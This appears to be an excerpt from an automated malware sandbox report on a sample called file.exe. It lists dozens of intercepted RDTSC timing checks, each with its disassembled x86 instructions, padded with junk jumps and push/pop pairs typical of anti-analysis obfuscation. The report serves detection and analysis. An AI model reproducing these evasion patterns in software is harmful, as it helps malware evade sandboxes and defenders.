                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DEFE second address: 75DF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F488C756CFEh 0x0000000f jns 00007F488C756CF6h 0x00000015 popad 0x00000016 jnc 00007F488C756CF8h 0x0000001c pushad 0x0000001d je 00007F488C756CF6h 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DEC4 second address: 71DECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5A5A second address: 7A5A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F488C756CFEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F488C756D07h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5A90 second address: 7A5A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5A95 second address: 7A5A9F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F488C756CFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC027 second address: 7AC02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC02D second address: 7AC034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC034 second address: 7AC099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F488D045412h 0x0000000b popad 0x0000000c pushad 0x0000000d jnl 00007F488D045411h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F488D045407h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB96 second address: 7ABB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB9A second address: 7ABB9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB9E second address: 7ABBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD01 second address: 7ABD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD0C second address: 7ABD59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D01h 0x00000007 jnl 00007F488C756CFCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F488C756D09h 0x00000017 jne 00007F488C756CF6h 0x0000001d jnc 00007F488C756CF6h 0x00000023 popad 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD59 second address: 7ABD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F488D0453F6h 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD64 second address: 7ABD7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F488C756D03h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD7E second address: 7ABD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F488D045406h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCBF5 second address: 7BCC1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F488C756D01h 0x0000000d pop esi 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F488C756CFCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE2CB second address: 7BE2DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F488D0453F6h 0x00000008 jne 00007F488D0453F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F4E second address: 7C6F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F52 second address: 7C6F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F56 second address: 7C6F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FBB second address: 7C5FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FC1 second address: 7C5FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FC7 second address: 7C5FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FCB second address: 7C5FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F488C756D03h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C615F second address: 7C6167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6167 second address: 7C616C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9554 second address: 7C9576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045406h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F488D0453F6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB28E second address: 7CB2A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F488C756CF6h 0x00000009 jmp 00007F488C756D00h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC83D second address: 7DC841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D701E second address: 7D7023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF25 second address: 6DFF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF2A second address: 6DFF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF30 second address: 6DFF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF34 second address: 6DFF44 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF44 second address: 6DFF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF4D second address: 6DFF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805C5D second address: 805C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F488D0453FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805C74 second address: 805C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805F17 second address: 805F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805F1E second address: 805F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805F23 second address: 805F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8061E0 second address: 806218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D06h 0x00000007 push ecx 0x00000008 jmp 00007F488C756D01h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806218 second address: 80621F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80621F second address: 80623A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F488C756D03h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80623A second address: 806252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045404h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806252 second address: 806256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8067D4 second address: 806812 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F488D045405h 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F488D045405h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F488D045402h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806812 second address: 806824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F488C756CF6h 0x0000000a js 00007F488C756CF8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8096D1 second address: 8096D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809770 second address: 809787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F488C756CFDh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809787 second address: 8097ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F488D0453FCh 0x0000000c jbe 00007F488D0453F6h 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F488D0453FEh 0x00000019 push 00000004h 0x0000001b mov dh, 8Ch 0x0000001d mov edx, dword ptr [ebp+124550E6h] 0x00000023 call 00007F488D0453F9h 0x00000028 pushad 0x00000029 jmp 00007F488D045403h 0x0000002e jo 00007F488D0453FCh 0x00000034 js 00007F488D0453F6h 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e je 00007F488D0453F6h 0x00000044 push ebx 0x00000045 pop ebx 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8097ED second address: 8097F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8097F1 second address: 809815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F488D0453FEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F488D0453F6h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809AC5 second address: 809ADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F488C756CFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809ADF second address: 809AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F488D0453FCh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809AF3 second address: 809B3A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F488C756CFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F488C756D09h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 je 00007F488C756CF8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 je 00007F488C756CF6h 0x0000002a pop esi 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809B3A second address: 809B3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CC36 second address: 80CC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756CFBh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E766 second address: 80E76C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50EFD second address: 4B50F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F488C756CFEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 mov esi, 67DB2769h 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50F35 second address: 4B50F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F488D045406h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F488D045407h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40D7C second address: 4B40DA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F488C756CFCh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40DA0 second address: 4B40DA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40DA6 second address: 4B40DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B806BC second address: 4B806E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B806E3 second address: 4B80779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C529h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F488C756D05h 0x00000012 or ah, 00000036h 0x00000015 jmp 00007F488C756D01h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F488C756D00h 0x00000021 jmp 00007F488C756D05h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov edx, 33B2CC1Eh 0x00000031 pushfd 0x00000032 jmp 00007F488C756CFFh 0x00000037 or al, FFFFFFCEh 0x0000003a jmp 00007F488C756D09h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B80779 second address: 4B807AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F488D045406h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20132 second address: 4B20187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488C756D09h 0x00000009 sbb al, FFFFFFA6h 0x0000000c jmp 00007F488C756D01h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F488C756D09h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20187 second address: 4B2018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2018B second address: 4B20191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20191 second address: 4B201B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6089h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F488D045402h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B201B7 second address: 4B20252 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F488C756D08h 0x00000008 sbb ah, 00000038h 0x0000000b jmp 00007F488C756CFBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F488C756D08h 0x00000019 adc al, FFFFFF98h 0x0000001c jmp 00007F488C756CFBh 0x00000021 popfd 0x00000022 popad 0x00000023 push dword ptr [ebp+04h] 0x00000026 jmp 00007F488C756D06h 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f mov di, cx 0x00000032 pushfd 0x00000033 jmp 00007F488C756CFAh 0x00000038 and cx, 9A28h 0x0000003d jmp 00007F488C756CFBh 0x00000042 popfd 0x00000043 popad 0x00000044 push dword ptr [ebp+08h] 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20252 second address: 4B20258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40B2E second address: 4B40B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F488C756D05h 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push edx 0x0000001a mov bh, ah 0x0000001c pop edx 0x0000001d call 00007F488C756CFEh 0x00000022 mov edi, esi 0x00000024 pop eax 0x00000025 popad 0x00000026 pop ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4074E second address: 4B40754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40754 second address: 4B40758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40758 second address: 4B4075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4075C second address: 4B4078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F488C756CFCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F488C756D00h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4078C second address: 4B40790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40790 second address: 4B407AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B407AD second address: 4B407B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B407B3 second address: 4B407B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B407B7 second address: 4B407BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA024E second address: 4BA02AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F488C756CFEh 0x00000011 push dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F488C756CFEh 0x0000001b jmp 00007F488C756D05h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov di, ax 0x00000026 rdtsc
